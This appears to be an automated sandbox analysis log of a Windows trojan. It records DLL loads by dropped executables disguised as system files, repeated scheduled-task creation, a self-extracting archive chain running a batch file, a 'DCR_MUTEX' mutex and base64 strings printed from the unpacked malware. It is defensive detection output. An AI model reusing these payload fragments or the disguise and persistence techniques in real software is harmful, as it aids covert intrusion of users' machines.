Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: version.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: sspicli.dll
Source: C:\Recovery\winlogon.exe Section loaded: mscoree.dll
Source: C:\Recovery\winlogon.exe Section loaded: apphelp.dll
Source: C:\Recovery\winlogon.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\winlogon.exe Section loaded: version.dll
Source: C:\Recovery\winlogon.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: uxtheme.dll
Source: C:\Recovery\winlogon.exe Section loaded: windows.storage.dll
Source: C:\Recovery\winlogon.exe Section loaded: wldp.dll
Source: C:\Recovery\winlogon.exe Section loaded: profapi.dll
Source: C:\Recovery\winlogon.exe Section loaded: cryptsp.dll
Source: C:\Recovery\winlogon.exe Section loaded: rsaenh.dll
Source: C:\Recovery\winlogon.exe Section loaded: cryptbase.dll
Source: C:\Recovery\winlogon.exe Section loaded: sspicli.dll
Source: C:\Recovery\winlogon.exe Section loaded: mscoree.dll
Source: C:\Recovery\winlogon.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\winlogon.exe Section loaded: version.dll
Source: C:\Recovery\winlogon.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: uxtheme.dll
Source: C:\Recovery\winlogon.exe Section loaded: windows.storage.dll
Source: C:\Recovery\winlogon.exe Section loaded: wldp.dll
Source: C:\Recovery\winlogon.exe Section loaded: profapi.dll
Source: C:\Recovery\winlogon.exe Section loaded: cryptsp.dll
Source: C:\Recovery\winlogon.exe Section loaded: rsaenh.dll
Source: C:\Recovery\winlogon.exe Section loaded: cryptbase.dll
Source: C:\Recovery\winlogon.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: mscoree.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: apphelp.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: version.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: wldp.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: profapi.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: sspicli.dll
Source: C:\Recovery\winlogon.exe Section loaded: mscoree.dll
Source: C:\Recovery\winlogon.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\winlogon.exe Section loaded: version.dll
Source: C:\Recovery\winlogon.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: uxtheme.dll
Source: C:\Recovery\winlogon.exe Section loaded: windows.storage.dll
Source: C:\Recovery\winlogon.exe Section loaded: wldp.dll
Source: C:\Recovery\winlogon.exe Section loaded: profapi.dll
Source: C:\Recovery\winlogon.exe Section loaded: cryptsp.dll
Source: C:\Recovery\winlogon.exe Section loaded: rsaenh.dll
Source: C:\Recovery\winlogon.exe Section loaded: cryptbase.dll
Source: C:\Recovery\winlogon.exe Section loaded: sspicli.dll
Source: C:\Recovery\winlogon.exe Section loaded: ktmw32.dll
Source: C:\Recovery\winlogon.exe Section loaded: propsys.dll
Source: C:\Recovery\winlogon.exe Section loaded: edputil.dll
Source: C:\Recovery\winlogon.exe Section loaded: urlmon.dll
Source: C:\Recovery\winlogon.exe Section loaded: iertutil.dll
Source: C:\Recovery\winlogon.exe Section loaded: srvcli.dll
Source: C:\Recovery\winlogon.exe Section loaded: netutils.dll
Source: C:\Recovery\winlogon.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\winlogon.exe Section loaded: wintypes.dll
Source: C:\Recovery\winlogon.exe Section loaded: appresolver.dll
Source: C:\Recovery\winlogon.exe Section loaded: bcp47langs.dll
Source: C:\Recovery\winlogon.exe Section loaded: slc.dll
Source: C:\Recovery\winlogon.exe Section loaded: userenv.dll
Source: C:\Recovery\winlogon.exe Section loaded: sppc.dll
Source: C:\Recovery\winlogon.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Recovery\winlogon.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Recovery\winlogon.exe Section loaded: mpr.dll
Source: C:\Recovery\winlogon.exe Section loaded: pcacli.dll
Source: C:\Recovery\winlogon.exe Section loaded: sfc_os.dll
Source: H9gMIu2HXi.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformBlock'
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformBlock'
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, qJk.cs Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, sz3.cs Base64 encoded string: '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'
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class17.cs Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class16.cs Base64 encoded string: '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', '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
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, qJk.cs Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, sz3.cs Base64 encoded string: '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'
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class17.cs Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class16.cs Base64 encoded string: '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', 'H4sIAAAAAAAEADSbx5KCaBRG32W2LMhpSc45MyvJGQGJTz/0YrrK1tIu+dP97jnV+u+//8jYpjD//1gIzcVNEBbKWVnkj/z9VqdbWHJ/Ct0Qxt91eFHemCwnNh1xqQPju5A17Q7Hqhf6/hZOH2WZUBTkHBJlqQlluQqvU8qjMHdPtwhcWakXC5sffVawlRricM8q38lwlDpIG3yeAwQfGwH8aP18/S+F4UW5RkiEofmVFk/sGYYP5yqEnXTXdRM1bTZKE1jwRcgAHzu8qSSQwAx7h7Es1sfF3umZVKAZZ5ZnSz7Srhf6nJ0AYa1diub4jyTW81MgWy+yRDZITvotl8TGkAtJNKvK1uPGuZG+GL+BN1FAjLVOGWxFoIzhi/xHLLADPz0dfTbwJNI2oohHY4v+phtdiQFgBy8JRW6npKjriMaWKGZctwzESZsWpulZJkbWVATaOIVyvKZSDiaU38jdu2H64991BveZUEIK1QV7LxTLR1pZ6ms2K3DJpRR5IvcjSGtZ6x+ghgWed/GUATY6pr54SnetULE9atyI0iSD8HpRId8NhHJG95f5ywjEU9eRJ6X8aeLIsK0eIjJIx49JT0QPr2bqNtTIjUj4Y8RR7ZW/9Crvlu5EUtSQOkQlc9V1xI03b/2oWZTG2+dIxSkxEWpBtuhIiykpdpwsTgnvTVIoSClFOHAzh/g3w5gCgdgSHHllVZX9RUzV1J6oMjt+d/pMAijDGM5g1+BLzRmEvU88lobL2nW9zjcBFlosXVsN8+di5YYTziWxci2J4DSyOo+AipXKLZaVhayT+PkPMdoOAnnKwCEp32/4ItvqWoKi7hvtCofIetCJtLrwJyJ95COhHjJHsZ8hHsz9xCwql7CFww6ewg8s69tnHZCfS6jaBHtDti5+XAtU1UJeoCPUnmvpqJ/gDpKmv2Q+Ivr4syj4BbVeUexfYweDMcY+zhp8gKQ3SgcysB52kvSdp8zRdx7mTFhLGx0bdFMN3Cm3GDsIbJLUyizkLCMpmGAoM9M0vofFOh86fJzqbWTwaWFu0yhv7fxc1ZDhNkz93qf6CFn7yMqMJ75DQKc6wdZUvU+IQjNCVVv3+ttkpIKSht2+V5xjVeKtpS5o8PJVo+cBVCzV6ggClgN/rd92vVUmWUuWtlT5qzGrpvk5FrCsFlA6qq+PQ4zrofy8Ecy7qU93YTG1gsVDbLXbipz3oI63QskTmJCl6V87Hc4ca1YjkCaEfrbRab5AWapZc5rmLMBNilOi5f80sQwJ//ED6YYW2cSG0eY6VAN0DYRnZrBysv84HaJY0yXj0YmnAJSkUhXQAEPD6BZoRzlqFhjfMRXiDi0CKWvZk9JEA2v1JYJ3wVYD5U+RnuzHwTIwSVblLxVxGx84/rEuf+vg0ThvSXjkZH212X9kW8Y3EihbUACsKtbeFfF/H+757EcC7TbU1qw323waDUujOTKO+mo66ASANniN85W83Ndwq4eYo08FLeyEtKCSzceNaCzl4rlt35qpbMA95s0JfEiUL6CzdL99bndCR9gsHZ8ljjbxUBM6pbnZFjq/HVULlJiwrVCQqIkvm2v0SiS/lnc7VJt7icspYJ8yPhdRLRZs/dUmHnZpat373ATVgdqoYhu4lzJInqdctirMPudFriZs/d1YKnRZKpdMwiW8R0Fw26BVLiuVZo9zFgHrv23uB66kfpROoPu0dT3jMlQpGYQhUi91VC/rEpIea42srGpZ2hyjKMW7LpFvKDPcF3R0JnNchAkF8VuLP6t0+frDhI2vAA0+zIqZz63CmQMmpbg5Amg+JdTmQj5+8l/J+ahHffrpTYlmHbTPRkRfaCylgLOG7oyq7y6aQMDL0jl/q/PndBJccUCNRJEtzHYv60Q8BPnZTPbPCCAS9hqPn5mpYKgZHo9maRBg+tjhZBvyQNvNfilPgsTekdPLmFN5qovqYX6s/EBU4S6k7zmXI4cn91RR+a4K6DWWXMKs8CnuwQeTF87KjXabk1DdO9oCmfsKASNgHR9bmZ/h3uCBz51SjKqkLprDGdp2Sx633lbayQopmpA4oRx6Um4PIhaILge6a+9R2MFNY8W8RRS1li2QppK26kaeO3Xs8PaOLD2vgOyyw1D0sKW4KlFLGkqkmWqX9FJd9lYmQcAqqUhaVj/YuCMnMtofECaKMic/6PCtDk0EnQlFziP6PoNO8b89heFnha/Etao0IegEDJYcFCxQxImfG2OgBwRouKgm8b2JwR9PcamcRdxO7KTmhK2ibwd72oBcqJbrnZiIS0fDY6AbLCl4pVRvAXZho1U
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, HBw.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, HBw.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, HBw.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, HBw.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.spre.troj.expl.evad.winEXE@60/41@2/2
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A27727 GetLastError,FormatMessageW, 0_2_00A27727
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3B6D2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00A3B6D2
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe File created: C:\Users\user\AppData\Roaming\msBroker Jump to behavior
Source: C:\Recovery\winlogon.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: C:\Recovery\winlogon.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-wSLzwx2vNs3ciNJLvHL2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0 Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Command line argument: sfxname 0_2_00A3F05C
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Command line argument: sfxstime 0_2_00A3F05C
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Command line argument: STARTDLG 0_2_00A3F05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Command line argument: sfxname 3_2_0032F05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Command line argument: sfxstime 3_2_0032F05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Command line argument: p05 3_2_0032F05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Command line argument: STARTDLG 3_2_0032F05C
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Command line argument: sfxname 4_2_0073DF1E
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Command line argument: sfxstime 4_2_0073DF1E
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Command line argument: STARTDLG 4_2_0073DF1E
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Command line argument: xzw 4_2_0073DF1E
Source: H9gMIu2HXi.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
